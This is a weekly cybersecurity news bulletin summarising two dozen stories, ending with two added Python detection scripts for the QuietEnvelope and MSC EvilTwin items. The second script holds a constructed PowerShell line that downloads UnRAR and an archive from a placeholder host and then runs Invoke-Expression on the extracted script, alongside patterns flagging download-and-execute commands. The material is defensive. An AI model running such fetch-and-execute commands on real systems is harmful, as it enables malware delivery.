ThreatsDay Bulletin: AI Malware, Voice Bot Flaws, Crypto Laundering, IoT Attacks — and 20 More Stories

News Room
Last updated: 2025/11/27 at 6:01 AM
Published 27 November 2025

Nov 27, 2025Ravie LakshmananCybersecurity / Hacking News

Hackers have been busy again this week. From fake voice calls and AI-powered malware to huge money-laundering busts and new scams, there’s a lot happening in the cyber world.

Criminals are getting creative — using smart tricks to steal data, sound real, and hide in plain sight. But they’re not the only ones moving fast. Governments and security teams are fighting back, shutting down fake networks, banning risky projects, and tightening digital defenses.

Here’s a quick look at what’s making waves this week — the biggest hacks, the new threats, and the wins worth knowing about.

  1. Mirai-based malware resurfaces with new IoT campaign

    The threat actors behind the Mirai-based ShadowV2 botnet have been observed infecting IoT devices across industries and continents. The campaign is said to have been active only during the Amazon Web Services (AWS) outage in late October 2025. It’s assessed that the activity was “likely a test run conducted in preparation for future attacks,” per Fortinet. The botnet exploited several flaws, including CVE-2009-2765 (DD-WRT), CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915 (D-Link), CVE-2023-52163 (DigiEver), CVE-2024-3721 (TBK), and CVE-2024-53375 (TP-Link), to recruit susceptible gear into a zombie army of IoT devices. A successful exploitation is followed by the execution of a downloader shell script that delivers the ShadowV2 malware for subsequent DDoS attacks. “IoT devices remain a weak link in the broader cybersecurity landscape,” the company said. “The evolution of ShadowV2 suggests a strategic shift in the targeting behavior of threat actors toward IoT environments.” It’s not just ShadowV2. Another DDoS botnet named RondoDox, also based on Mirai, has weaponized over a dozen exploits to target IoT devices. “Attackers are not only motivated to target vulnerable IoT devices, but also how, if successful, they will take over previously infected devices to add them to their own botnets,” F5 said.

  2. Singapore tightens messaging rules to fight spoof scams

    Singapore has ordered Apple and Google to block or filter messages on iMessage and the RCS-supported Messages app for Android that masquerade as government agencies, requiring the two companies to implement new anti-spoofing protections starting December 2025 as part of efforts to curb rising online scams. According to the Straits Times, Apple has been issued a directive under the Online Criminal Harms Act, requiring the tech giant to prevent iMessage accounts and group chats from using names that mimic Singapore government agencies or the “gov.sg” sender ID.

  3. Tor bolsters privacy with new encryption upgrade

    The developers behind the Tor project are preparing a major upgrade called Counter Galois Onion (CGO), which replaces the long-standing relay encryption method used across the anonymity network. “It’s based on a kind of construction called a Rugged Pseudorandom Permutation (RPRP): essentially, it’s a design for a wide-block cipher that resists malleability in one direction (for the encrypt operation, but not the decrypt operation),” the Tor Project said. “If we deploy this so that clients always decrypt and relays always encrypt, then we have a tagging-resistant cipher at less cost than a full SPRP [strong pseudorandom permutation]!” The updates aim to raise the cost of active attacks along a circuit, such as tagging and traffic-interception attacks, as well as prevent bad actors from tampering with encrypted traffic, add forward secrecy, and make the network more resilient.

  4. Report shows surge in phishing during 2025 shopping season

    Kaspersky said it identified nearly 6.4 million phishing attacks, which targeted users of online stores, payment systems, and banks in the first ten months of 2025. “As many as 48.2% of these attacks were directed at online shoppers,” it said, adding it “detected more than 2 million phishing attacks related to online gaming” and “blocked more than 146,000 Black Friday-themed spam messages in the first two weeks of November.”

  5. Stealthy malware targets OpenFind mail servers

    ESET has disclosed details of a new toolset dubbed QuietEnvelope that’s specifically developed to target the MailGates email protection system of OpenFind email servers. The toolset comprises Perl scripts and three stealthy backdoors, among other miscellaneous files. “The Perl scripts are mainly responsible for deploying three passive backdoors as a loadable kernel module (LKM), an Apache module, and an injected shellcode,” ESET said. “Together, they enable the attackers to have remote access to a compromised server.” The LKM component (“smtp_backdoor”) monitors ingress TCP traffic on port 6400 and triggers when packets contain the magic string EXEC_OPENFIND to execute the command. “The Apache module expects the command, which is executed via popen, in the custom HTTP header OpenfindMaster,” it added. “The third backdoor is injected into a running mgsmtpd process. It is capable of retrieving file content and executing commands. By default, it responds with 250 OK, suggesting that the backdoor is hooked into the code that is maybe responsible for generating the SMTP response.” The tool is believed to be the work of an unknown state-sponsored threat actor, given the sophistication and its ability to blend in. ESET said it found debug strings written in simplified Chinese, which is mainly used in Mainland China.

  6. Russia-linked hackers abuse MSC flaw for stealthy infection

    A Bing search for “belay” leads to the website “belaysolutions[.]com,” which is said to have been compromised with malicious JavaScript that performs a silent redirect to “belaysolutions[.]link” that hosts a double-extension RAR payload disguised as a PDF. Opening the initial payload exploits MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe, ultimately leading to the deployment of a loader executable that’s capable of installing backdoors or stealers. “When run, mmc.exe resolves MUI paths that load the malicious snap-in instead of the legitimate one, triggering embedded TaskPad commands with an encoded PowerShell payload,” Zscaler said. “Decoded via -EncodedCommand, this script downloads UnRAR[.]exe and a password-protected RAR, extracts the next stage, waits briefly, then Invoke-Expression on the extracted script.” The second script displays a decoy PDF and downloads and executes the loader binary. The exact nature of the payload is unclear due to the fact that the command-and-control (C2) infrastructure is unresponsive. The attack chain has been attributed to a Russia-aligned APT group known as Water Gamayun (aka EncryptHub).

  7. NCA uncovers crypto laundering tied to Russian sanctions evasion

    The U.K. has exposed two companies, Smart and TGR, which laundered money from cybercrime, drugs trade, firearms smuggling, and immigration crime for a fee, to create “clean” cryptocurrency that the Russian state could then use to evade international sanctions. The National Crime Agency (NCA) said the two entities acquired a bank in Kyrgyzstan to pose as legitimate operations. The network is known to operate in at least 28 U.K. cities and towns. “Smart and TGR collaborated to launder money for transnational crime groups involved in cybercrime, drugs, and firearms smuggling,” the NCA said. “They also helped their Russian clients to illegally bypass financial restrictions to invest money in the U.K., threatening the integrity of our economy.”

  8. Defender update removes lingering malicious invites

    Microsoft said it has updated Defender for Office 365 to help security teams remove calendar entries automatically created by Outlook during email delivery. While remediation actions such as Move to Junk, Delete, Soft Delete, and Hard Delete can be used to eliminate email threats from users’ inboxes, the actions did not touch the calendar entry created by the original invite. “With this update, we’re taking the first step toward closing that gap,” the company said. “Hard Delete will now also remove the associated calendar entry for any meeting invite email. This ensures threats are fully eradicated—not just from the inbox but also from the calendar—reducing the risk of user interaction with malicious content.”

  9. Thailand cracks down on Worldcoin-style biometric collection

    Data regulators in Thailand have ordered TIDC Worldverse, which represents the Sam Altman-founded startup Tools for Humanity in the country, to stop the collection of iris biometrics in exchange for World (formerly Worldcoin) cryptocurrency payments. It has also demanded the deletion of biometric data already collected from 1.2 million Thai citizens. The project has witnessed similar bans in Brazil, the Philippines, Indonesia, and Kenya.

  10. 21-year-old cybersecurity specialist detained over state criticism

    Timur Kilin, a 21-year-old tech entrepreneur and cybersecurity specialist, was arrested in Moscow on treason charges late last week. While the details of the case are unknown, it’s suspected that Kilin may have attracted the attention of authorities after criticizing the state-backed messaging app Max and the government’s anti-cybercrime legislation.

  11. Chinese-speaking group expands global smishing reach to Egypt

    Threat actors associated with the Smishing Triad have expanded their focus to target Egypt by setting up malicious domains impersonating major Egyptian service providers, including Fawry, the Egypt Post, and Careem. The Smishing Triad is a Chinese-speaking cybercriminal group specializing in large-scale smishing campaigns across the world using a phishing kit named Panda. “Beyond U.S. service impersonation, the smishing kit offers a wide range of international templates, including those that mimic prominent ISPs such as Du (U.A.E.),” Dark Atlas said. “These templates are designed to harvest PII from victims across different regions, significantly expanding the campaign’s global reach.” Recently, Google filed a civil lawsuit in the U.S. District Court for the Southern District of New York (SDNY) against a massive Phishing-as-a-Service (PhaaS) platform called Lighthouse that has ensnared over 1 million users across 120 countries. Lighthouse is one of the PhaaS services used by the Smishing Triad. The PhaaS kits are primarily distributed through Telegram by a threat actor named Wang Duo Yu (@wangduoyu8).

  12. Privacy service ends after ties to data broker controversy

    Mozilla has announced plans to shut down Monitor Plus, a service that allowed user data to be removed from data broker portals. The service will wind down on December 17, 2025. It was offered through a partnership with Onerep, a controversial company whose Belarusian CEO, Dimitri Shelest, was caught running dozens of people-search services since 2010. “Mozilla Monitor’s free monitoring service will continue to provide real-time alerts and step-by-step guides to mitigate the risks of a data breach,” Mozilla said.

  13. Phishing campaigns drop RATs on Russian corporate targets

    A new threat actor named NetMedved is targeting Russian companies with phishing emails containing ZIP archives that include a LNK file masquerading as a purchase request, along with other decoy documents. Opening the LNK file triggers a multi-stage infection sequence that drops NetSupport RAT. The activity, per Positive Technologies, was observed in mid-October 2025. The development comes as F6 detailed new attacks mounted by VasyGrek (aka Fluffy Wolf), a Russian-speaking e-crime actor known for striking Russian companies since 2016 to deliver remote access trojans (RATs) and stealer malware. The latest set of attacks recorded between August and November 2025 involved the use of the Pay2Key ransomware, as well as malware developed by PureCoder, including PureCrypter, PureHVNC, and PureLogs Stealer.

  14. Blockchain-hosted payloads deliver AMOS, Vidar, Lumma stealers

    Threat actors are compromising legitimate websites with malicious JavaScript injects that serve site visitors fake CAPTCHA checks. The checks carry a Base64-encoded payload that displays a ClickFix lure tailored to the victim’s operating system, using the EtherHiding technique: intermediate JavaScript payloads are hidden on the blockchain, and four smart contracts deployed on the Binance Smart Chain (BSC) check that the victim is not a bot and direct them to an operating system (OS)-specific contract. However, the OS-specific JavaScript is delivered only after a call to a gate contract that responds with either “yes” or another value. “This gate provides the attacker with a remotely controlled feature flag,” Censys said. “By altering on-chain state, the operator can selectively enable or disable delivery for specific victims, throttle execution, or temporarily disable the entire campaign.” The payloads distributed throughout the chains include common stealers like AMOS and Vidar. Similar drive-by compromise attacks have also been found to display counterfeit CAPTCHA verifications that leverage the ClickFix tactic to drop Lumma Stealer, according to NCC Group.

  15. Microsoft links 13M phishing emails to top PhaaS operation

    Microsoft said the PhaaS toolkit known as Tycoon 2FA (aka Storm-1747) has emerged as the most prolific platform observed by the company this year. In October 2025 alone, Microsoft Defender for Office 365 blocked more than 13 million malicious emails linked to Tycoon 2FA. “More than 44% of all CAPTCHA-gated phishing attacks blocked by Microsoft were attributed to Tycoon 2FA,” it said. “Tycoon2FA was also directly linked to nearly 25% of all QR code phishing attacks detected in October.” First discovered in 2023, Tycoon 2FA has evolved into a potent tool that leverages real-time Adversary-in-the-Middle (AitM) techniques to capture credentials, steal session tokens, and one-time codes. “The platform delivers high-fidelity phishing pages for Microsoft 365, Gmail, and Outlook, and has become a preferred tool among threat actors due to its subscription-based, low-barrier operational model,” CYFIRMA said.

  16. Malware uses AI mimicry to bypass behavioral defenses

    A new version of Xillen Stealer has introduced advanced features to evade AI-based detection systems by mimicking legitimate users and adjusting CPU and memory usage to imitate normal apps. Its main goal is to steal credentials, cryptocurrency, and sensitive data across browsers, password managers, and cloud environments. It’s marketed on Telegram for between $99 and $599 per month. The latest iteration also includes code to use AI to detect high-value targets based on weighted indicators and relevant keywords defined in a dictionary. These include cryptocurrency wallets, banking data, premium accounts, developer accounts, and business emails, along with location indicators that include high-value countries such as the U.S., the U.K., Germany, and Japan, and other cryptocurrency-friendly countries and financial hubs. While the feature is not fully implemented by its authors, Xillen Killers, the development shows how threat actors could be leveraging AI in future campaigns, Darktrace said.

  17. FCC reverses course on telecom cybersecurity policy

    The Federal Communications Commission (FCC) has scrapped a set of telecom cybersecurity rules introduced after the Salt Typhoon espionage campaign came to light last year to prevent state-sponsored hackers from breaching American carriers. The ruling came into effect in January 2025. The course reversal comes after what the FCC said were “extensive, urgent, and coordinated efforts” from carriers to mitigate operational risks and better protect consumers. The action follows “months-long engagement with communications service providers where they have demonstrated a strengthened cybersecurity posture following Salt Typhoon,” the agency said, adding that it has “taken a series of actions to harden communications networks and improve their security posture to enhance the agency’s investigative process into communications networks outages that result from cyber incidents.” This included establishing a Council on National Security and adopting rules to address cybersecurity risks to critical communications infrastructure without “imposing inflexible and ambiguous requirements.” However, the FCC’s announcement offers no details on how those improvements will be monitored or enforced.

  18. Teen suspects deny charges in Transport for London hack

    Two British teenagers who were charged with Computer Misuse Act offenses over a cyber attack on Transport for London (TfL) last year pleaded not guilty during a court appearance last week. Thalha Jubair, 19, and Owen Flowers, 18, were arrested at their homes in East London and Walsall, respectively, by officers from the National Crime Agency (NCA) in September 2025.

  19. Unpatched flaw lets AI voice agents enable large-scale scams

    A security vulnerability has been disclosed in the Retell AI API, which creates AI voice agents that have excessive permissions and functionality. This stems from a lack of sufficient guardrails that causes its large language model (LLM) to deliver unintended outputs. An attacker could exploit this behavior to stage large-scale social engineering, phishing, and misinformation campaigns. “The vulnerability targets Retell AI’s ease of deployment and customizability to perform scalable phishing/social engineering attacks,” the CERT Coordination Center (CERT/CC) said. “Attackers can feed publicly available resources as well as some instructions to Retell AI’s API to generate high-volume and automated fake calls. These fake calls could lead to unauthorized actions, security breaches, data leaks, and other forms of manipulation.” The issue remains unpatched.

  20. Study shows cybercriminal job market mirrors real-world economy

    A new analysis from Kaspersky has revealed that the dark web continues to serve as a parallel labor market with its own rules, recruitment practices, and salary expectations, while also being influenced by current economic forces. “The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work,” the company said. “At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers, and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.”

  21. Android malware hides traffic behind hacked legitimate sites

    AhnLab said it discovered an Android APK malware (“com.golfpang.golfpanggolfpang”) impersonating a famous Korean delivery service, while taking steps to evade security controls using obfuscation and packing techniques. The data stolen by the malware is exfiltrated to a breached legitimate site that’s used for C2. “When the app is launched, it requests the permissions required to perform malicious behaviors from the user,” AhnLab said. In a similar development, a malicious program disguised as SteamCleaner is being propagated via websites that advertise cracked software to deliver a Node.js script capable of communicating with a C2 server periodically and executing commands issued by the attacker. While it’s not known what commands are sent via the C2 channel, AhnLab said the activity could lead to the installation of proxyware and other payloads. The counterfeit installers are hosted on GitHub repositories managed by the threat actor.

  22. ASIO chief warns of state-backed cyber threats to critical systems

    Director-General of Security Mike Burgess, the head of the Australian Security Intelligence Organisation (ASIO), disclosed that threat actors operating on behalf of China’s government and military probed the country’s telecoms network and key infrastructure. Burgess warned that authoritarian regimes “are growing more willing to disrupt or destroy critical infrastructure” using cyber sabotage. Espionage is estimated to have cost the country A$12.5 billion ($8.1 billion) in 2024. However, China has dismissed the remarks, stating they “spread false narratives and deliberately provoked confrontation.”

  23. Fake mayor jailed for life over massive cyber scam ring

    Alice Guo, a 35-year-old Chinese woman who posed as a local and was elected mayor of the city of Bamban in 2022, was sentenced to life in prison after she was found guilty of human trafficking for her role in running a huge cyber scam compound that operated under the cover of online casinos, known locally as Philippine Offshore Gaming Operations (Pogo). Guo and three others were sentenced to life in prison and fined 2 million pesos ($33,832).

  24. Old Windows protocol remains key target for credential theft

    Multiple vulnerabilities in Microsoft Windows have been exploited by threat actors to leak NTLM hashes and augment their post-exploitation efforts. These include CVE-2024-43451, which has been abused by BlindEagle and Head Mare; CVE-2025-24054, which has been abused in phishing attacks targeting Russia to deliver Warzone RAT; and CVE-2025-33073, which has been abused in “suspicious activity” against an unnamed target belonging to the financial sector in Uzbekistan. In this attack, the threat actor exploited the flaw to check whether they had sufficient privileges to execute code, using batch files that ran reconnaissance commands, established persistence, dumped LSASS memory, and unsuccessfully attempted to move laterally to the administrative share of another host. No further activity was detected. “While Microsoft has announced plans to phase it out, the protocol’s pervasive presence across legacy systems and enterprise networks keeps it relevant and vulnerable,” Kaspersky said. “Threat actors are actively leveraging newly disclosed flaws to refine credential relay attacks, escalate privileges, and move laterally within networks, underscoring that NTLM still represents a major security liability.”
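For item 5 (QuietEnvelope), the two network-level indicators ESET describes are concrete enough to hunt for: a TCP payload to port 6400 carrying the magic string EXEC_OPENFIND, and an HTTP request carrying the custom OpenfindMaster header. The following is an added detection example, not ESET's code; the traffic records it scans are constructed for the example.

```python
"""Added detection example, not ESET's code. It checks captured traffic
records for the two network-level QuietEnvelope indicators: a TCP payload to
port 6400 containing the magic string EXEC_OPENFIND (the LKM backdoor's
trigger) and an HTTP request carrying the custom OpenfindMaster header (the
Apache module's command channel). All traffic records are constructed."""
import re

MAGIC = b"EXEC_OPENFIND"           # trigger string watched for by the LKM backdoor
BACKDOOR_PORT = 6400               # port the LKM backdoor monitors
COMMAND_HEADER = "openfindmaster"  # header the Apache module reads (compared case-insensitively)

REQUEST_LINE = re.compile(r"^[A-Z]+ \S+ HTTP/1\.[01]$")


def parse_http_headers(payload: bytes) -> dict:
    """Return {lower-cased header name: value} for an HTTP request payload,
    or {} when the payload is not an HTTP request."""
    head = payload.partition(b"\r\n\r\n")[0].decode("latin-1")
    lines = head.split("\r\n")
    if not REQUEST_LINE.match(lines[0]):
        return {}
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def inspect(record: dict) -> list:
    """Return the indicator names that match one traffic record."""
    findings = []
    payload = record["payload"]
    if record["dst_port"] == BACKDOOR_PORT and MAGIC in payload:
        findings.append("lkm-backdoor-trigger")
    if COMMAND_HEADER in parse_http_headers(payload):
        findings.append("apache-module-command-header")
    return findings


def scan(records) -> list:
    """Map every record to (source, indicator) pairs; benign records yield nothing."""
    return [(r["src"], f) for r in records for f in inspect(r)]


# Constructed sample traffic: two records that should alert and two benign ones.
SAMPLE_TRAFFIC = [
    {"src": "203.0.113.7", "dst_port": 6400,
     "payload": b"\x00\x01EXEC_OPENFIND id\n"},
    {"src": "203.0.113.8", "dst_port": 80,
     "payload": b"GET /index.html HTTP/1.1\r\nHost: mail.example.test\r\n"
                b"OpenfindMaster: id\r\n\r\n"},
    {"src": "198.51.100.2", "dst_port": 80,
     "payload": b"GET / HTTP/1.1\r\nHost: mail.example.test\r\nUser-Agent: curl\r\n\r\n"},
    {"src": "198.51.100.3", "dst_port": 6400, "payload": b"hello"},
]

if __name__ == "__main__":
    for src, finding in scan(SAMPLE_TRAFFIC):
        print(f"{src}: {finding}")
```

The same two checks translate directly into IDS content-match rules on port 6400 payloads and on HTTP request headers.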
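For item 6 (MSC EvilTwin), the Zscaler write-up gives a hunting hook: mmc.exe spawning PowerShell with an -EncodedCommand payload that fetches UnRAR and a password-protected archive and then runs Invoke-Expression on the extracted script. The following is an added example, not Zscaler's code, that decodes the argument from a process-creation event and flags those traits; the events, hostname and script are constructed for the example.

```python
"""Added hunting example, not Zscaler's code. It decodes a PowerShell
-EncodedCommand argument from a process-creation event and flags the traits
of the MSC EvilTwin chain: PowerShell spawned by mmc.exe, a download of
UnRAR, and Invoke-Expression over the extracted script. Events, hostname
and script are constructed for the example."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_SWITCH = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENCODED_ARG = re.compile(r"-(?:%s)\s+([A-Za-z0-9+/=]+)" % _ENC_SWITCH, re.I)

# Traits of the decoded script worth flagging, in evaluation order.
INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:invoke-expression|iex)\b", re.I),
    "unrar-download": re.compile(r"unrar", re.I),
    "web-download": re.compile(
        r"invoke-webrequest|downloadfile|downloadstring|start-bitstransfer", re.I),
}


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the script carried by -EncodedCommand, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: dict) -> dict:
    """Return the decoded script (if any) and the list of matched traits."""
    hits = []
    if event["parent"].lower() == "mmc.exe":
        hits.append("spawned-by-mmc")
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        hits.append("encoded-command")
        hits.extend(name for name, pat in INDICATORS.items() if pat.search(script))
    return {"decoded": script, "hits": hits}


# Constructed stand-in for the second-stage script; the hostname is a placeholder.
CONSTRUCTED_SCRIPT = (
    "Invoke-WebRequest http://stage.example.invalid/UnRAR.exe -OutFile $env:TEMP\\UnRAR.exe; "
    "Invoke-WebRequest http://stage.example.invalid/p.rar -OutFile $env:TEMP\\p.rar; "
    "& $env:TEMP\\UnRAR.exe x -pPLACEHOLDER $env:TEMP\\p.rar $env:TEMP; "
    "Start-Sleep 5; Invoke-Expression (Get-Content $env:TEMP\\next.ps1 -Raw)"
)

# Constructed process-creation events: one matching the chain, one benign.
SAMPLE_EVENTS = [
    {"parent": "mmc.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
                + encode_for_powershell(CONSTRUCTED_SCRIPT)},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["parent"], "->", event["image"], assess(event)["hits"])
```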

That’s a wrap for this week’s ThreatsDay. The big picture? Cybercrime is getting faster, smarter, and harder to spot — but awareness still beats panic. Keep your software updated, stay alert for anything that feels off, and don’t click in a hurry. The more we all stay sharp, the harder it gets for attackers to win.
